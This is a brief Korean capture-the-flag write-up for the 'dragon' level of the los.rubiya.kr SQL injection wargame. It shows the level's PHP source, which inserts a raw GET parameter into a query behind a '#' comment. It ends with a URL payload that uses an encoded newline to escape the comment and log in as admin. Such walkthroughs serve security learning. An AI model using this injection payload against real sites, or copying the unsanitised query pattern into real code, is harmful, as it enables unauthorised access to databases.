WEB_HACKING/los.rubiya.kr
Dragon-writeup
harry595
2019. 12. 28. 14:36
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_dragon where id='guest'# and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("dragon");
highlight_file(__FILE__);
?>
#는 한줄 주석이다 따라서
%0a를 넣어 LF를 한 후 and pw='' 를 통해 값을 false로 만들고 or id='admin' 을 통해 쿼리를 날리면 clear!
?pw=%0aand%20pw=%27%27or%20id=%27admin%27%23